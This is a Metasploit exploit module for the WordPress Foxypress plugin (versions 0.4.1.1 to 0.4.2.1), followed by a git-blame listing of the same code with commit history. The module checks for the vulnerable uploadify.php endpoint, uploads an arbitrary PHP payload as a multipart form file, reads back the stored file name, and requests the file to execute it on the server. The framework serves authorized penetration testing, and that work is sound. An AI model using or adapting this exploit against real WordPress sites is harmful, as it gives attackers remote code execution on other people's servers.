metasploit-framework/modules/exploits/unix/webapp/php_wordpress_foxypress.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
      'Description'    => %q(
          This module exploits an arbitrary PHP code execution flaw in the WordPress
        blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
        file upload and remote code execution via the uploadify.php script. The Foxypress
        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
      ),
      'Author'         =>
        [
          'Sammy FORGIT', # Vulnerability Discovery, PoC
          'patrick' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '18991'],
          ['OSVDB' '82652'],
          ['BID', '53805'],
          ['WPVDB', '6231']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
      'DisclosureDate' => 'Jun 05 2012',
      'DefaultTarget' => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
    )

    return Exploit::CheckCode::Detected if res && res.code == 200

    Exploit::CheckCode::Safe
  end

  def exploit
    post_data = Rex::MIME::Message.new
    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

    print_status("#{peer} - Sending PHP payload")

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s
    )

    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end

    filename = "#{Regexp.last_match[1]}.php"

    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
    register_files_for_cleanup(filename)
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
    )

    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
  end
end
php_wordpress_foxypress from patrick updated. Related to Pull Request #475 2012-06-12 15:39:05 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
php_wordpress_foxypress from patrick updated. Related to Pull Request #475 2012-06-12 15:39:05 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

Updated foxpress module 2014-07-28 20:23:22 +00:00			`include Msf::HTTP::Wordpress`
			`include Msf::Exploit::FileDropper`
Retab modules 2013-08-30 21:28:54 +00:00
			`def initialize(info = {})`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`super(update_info(`
			`info,`
Fix caps on module titles (first pass) 2013-11-15 06:03:42 +00:00			`'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`'Description' => %q(`
Retab modules 2013-08-30 21:28:54 +00:00			`This module exploits an arbitrary PHP code execution flaw in the WordPress`
			`blogging software plugin known as Foxypress. The vulnerability allows for arbitrary`
			`file upload and remote code execution via the uploadify.php script. The Foxypress`
Correct version 2014-07-28 20:45:04 +00:00			`plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`),`
Retab modules 2013-08-30 21:28:54 +00:00			`'Author' =>`
			`[`
			`'Sammy FORGIT', # Vulnerability Discovery, PoC`
			`'patrick' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Use [] for References 2014-07-30 15:24:14 +00:00			`['EDB', '18991'],`
			`['OSVDB' '82652'],`
Added wpvulndb links 2014-10-02 21:03:31 +00:00			`['BID', '53805'],`
change WPVULNDBID to WPVDB 2014-10-03 15:13:18 +00:00			`['WPVDB', '6231']`
Retab modules 2013-08-30 21:28:54 +00:00			`],`
			`'Privileged' => false,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
Correct version 2014-07-28 20:45:04 +00:00			`'Targets' => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],`
Retab modules 2013-08-30 21:28:54 +00:00			`'DisclosureDate' => 'Jun 05 2012',`
			`'DefaultTarget' => 0))`
			`end`

			`def check`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`res = send_request_cgi(`
Retab modules 2013-08-30 21:28:54 +00:00			`'method' => 'GET',`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')`
			`)`
Retab modules 2013-08-30 21:28:54 +00:00
Updated foxpress module 2014-07-28 20:23:22 +00:00			`return Exploit::CheckCode::Detected if res && res.code == 200`

			`Exploit::CheckCode::Safe`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

			`def exploit`
			`post_data = Rex::MIME::Message.new`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")`
Retab modules 2013-08-30 21:28:54 +00:00
			`print_status("#{peer} - Sending PHP payload")`

Updated foxpress module 2014-07-28 20:23:22 +00:00			`res = send_request_cgi(`
Retab modules 2013-08-30 21:28:54 +00:00			`'method' => 'POST',`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),`
			`'ctype' => "multipart/form-data; boundary=#{post_data.bound}",`
Retab modules 2013-08-30 21:28:54 +00:00			`'data' => post_data.to_s`
Updated foxpress module 2014-07-28 20:23:22 +00:00			`)`
Retab modules 2013-08-30 21:28:54 +00:00
Updated foxpress module 2014-07-28 20:23:22 +00:00			`if res.nil? \|\| res.code != 200 \|\| res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/`
Retab modules 2013-08-30 21:28:54 +00:00			`print_error("#{peer} - File wasn't uploaded, aborting!")`
			`return`
			`end`

Updated foxpress module 2014-07-28 20:23:22 +00:00			`filename = "#{Regexp.last_match[1]}.php"`
Retab modules 2013-08-30 21:28:54 +00:00
Updated foxpress module 2014-07-28 20:23:22 +00:00			`print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")`
			`register_files_for_cleanup(filename)`
			`res = send_request_cgi(`
			`'method' => 'GET',`
			`'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)`
			`)`
Retab modules 2013-08-30 21:28:54 +00:00
Updated foxpress module 2014-07-28 20:23:22 +00:00			`print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
php_wordpress_foxypress from patrick updated. Related to Pull Request #475 2012-06-12 15:39:05 +00:00			`end`